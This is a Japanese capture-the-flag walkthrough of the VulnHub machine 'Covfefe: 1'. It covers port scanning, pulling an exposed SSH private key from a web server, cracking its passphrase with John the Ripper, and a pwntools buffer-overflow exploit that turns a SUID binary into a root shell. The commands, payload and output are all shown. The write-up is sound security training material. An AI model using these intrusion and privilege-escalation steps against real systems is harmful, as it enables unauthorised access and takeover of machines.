Covfefe: 1 VulnHub Walkthrough
nmap -Pn -sS -sV -p- 192.168.0.35
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10 (protocol 2.0) 80/tcp open http nginx 1.10.3 31337/tcp open http Werkzeug httpd 0.11.15 (Python 3.5.3)
ssh、80と31337でhttpが動いていることがわかります。
nikto -h 192.168.0.35
特に何もでず....
gobuster dir -u http://192.168.0.35 -w /usr/share/dirb/wordlists/big.txt -t 50 -q
これも特に何もでず....
nikto -h http://192.168.0.35:31337
+ Server may leak inodes via ETags, header found with file /robots.txt, inode: 1499600596.267103, size: 70, mtime: 1587808388 + Entry '/.bashrc' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/.profile' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/taxes/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + "robots.txt" contains 3 entries which should be manually viewed. + Allowed HTTP Methods: GET, HEAD, OPTIONS + OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information. + OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration. + OSVDB-3093: /.ssh: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web. + OSVDB-3093: /.ssh/authorized_keys: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web. + OSVDB-3093: /.ssh/id_rsa: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web. + OSVDB-3093: /.ssh/id_rsa.pub: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web. + 7935 requests: 12 error(s) and 15 item(s) reported on remote h
robots.txtや.sshディレクトリにある秘密鍵id_rsaでsshに接続できそうな気がしますね。
1つずつ確認していきます。
/taxes
Good job! Here is a flag: flag1{make_america_great_again}
flag1つ目がありました。
/.ssh
['id_rsa', 'authorized_keys', 'id_rsa.pub']
/.ssh/id_rsa
chmod 600 id_rsa
sshに接続するときにid_rsaを利用するためにid_rsaにパーミッション600を設定します。
ssh -i id_rsa simon@192.168.0.35
Enter passphrase for key 'id_rsa': simon@192.168.0.35: Permission denied (publickey).
パスフレーズが必要なのでssh2johnで解析します。
python3 /usr/share/john/ssh2john.py
# python3 /usr/share/john/ssh2john.py id_rsa > hash.txt
john hash.txt
starwars (id_rsa)
ssh -i id_rsa simon@192.168.0.35
Enter passphrase for key 'id_rsa': Linux covfefe 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26) i686 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. simon@covfefe:~$
そのユーザの権限で実行されるSUIDが設定されているファイルを探します。
$ find / -perm -4000 2>/dev/null /usr/bin/chsh /usr/bin/passwd /usr/bin/chfn /usr/bin/gpasswd /usr/bin/newgrp /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/local/bin/read_message /bin/umount /bin/su /bin/mount /bin/ping
どう考えても/usr/local/bin/read_messageが怪しいことがわかります。 stringsコマンドもないのでローカル環境に一旦ダウンロードするためにpython3で簡易HTTPサーバを立てます。
simon@covfefe:/tmp$ python3 -m http.server 8000 Serving HTTP on 0.0.0.0 port 8000 ... 192.168.0.26 - - [08/Jun/2020 01:47:19] "GET /read_message HTTP/1.1" 200 -
ローカルで環境でltraceを利用することでSimonを入力することで条件分岐がTrueになることがわかります。
ltrace ./read_message
__libc_start_main(0x5656a690, 1, 0xffddab84, 0x5656a760 <unfinished ...>
puts("What is your name?"What is your name?
) = 19
gets(0xffddaab8, 0x695383fc, 0x6e6f6d, 1Simon
) = 0xffddaab8
strncmp("Simon", "Simon", 5) = 0
printf("Hello %s! Here is your message:\n"..., "Simon"Hello Simon! Here is your message:
) = 36
execve(0xffddaacc, 0, 0, 0x695383fc) = 0xffffffff
+++ exited (status 0) +++
simon@covfefe:/tmp$ /usr/local/bin/read_message What is your name? Simon Hello Simon! Here is your message: Hi Simon, I hope you like our private messaging system. I'm really happy with how it worked out! If you're interested in how it works, I've left a copy of the source code in my home directory. - Charlie Root
/rootにソースコードがあるようなので確認をします。ここに2つ目のflagがあることがわかります。
simon@covfefe:/root$ cat flag.txt
cat: flag.txt: Permission denied
simon@covfefe:/root$ cat read_message.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
// You're getting close! Here's another flag:
// flag2{use_the_source_luke}
int main(int argc, char *argv[]) {
char program[] = "/usr/local/sbin/message";
char buf[20];
char authorized[] = "Simon";
printf("What is your name?\n");
gets(buf);
// Only compare first five chars to save precious cycles:
if (!strncmp(authorized, buf, 5)) {
printf("Hello %s! Here is your message:\n\n", buf);
// This is safe as the user can't mess with the binary location:
execve(program, NULL, NULL);
} else {
printf("Sorry %s, you're not %s! The Internet Police have been informed of this violation.\n", buf, authorized);
exit(EXIT_FAILURE);
}
}
simon@covfefe:/root$
bufがSimonであるときに、programが実行されることがわかります。ここを/bin/shに書き換えられたら、root権限でシェルを起動できます。
ローカル環境でいろいろ試してると、BOFがあることがわかります。
root@kali:~/vulnhub/covfefe_1# ./read_message What is your name? Simonaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Hello Simonaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! Here is your message: Segmentation fault
bufのサイズは20バイトでスタックで考えるとその下にprogram変数があるので20バイトpaddingすればその次からprogram変数が書き換えられると予想することができます。
以下のExploitコードを作成し、ローカル環境で動かしたところshellを起動することができたのでpayloadをコピペしリモート環境でも試したところroot権限でシェルを起動することができました。
from pwn import *
e = ELF('./read_message')
p = process('./read_message')
payload = 'Simon'
payload += 'A'*(20-len(payload))
payload += '/bin/sh'
print "payload: " + payload
p.sendline(payload)
p.sendline('/bin/sh')
p.interactive()
simon@covfefe:/root$ /usr/local/bin/read_message
What is your name?
SimonAAAAAAAAAAAAAAA/bin/sh
Hello SimonAAAAAAAAAAAAAAA/bin/sh! Here is your message:
# whoami
root
# cat /root/flag.txt
You did it! Congratulations, here's the final flag:
flag3{das_bof_meister}
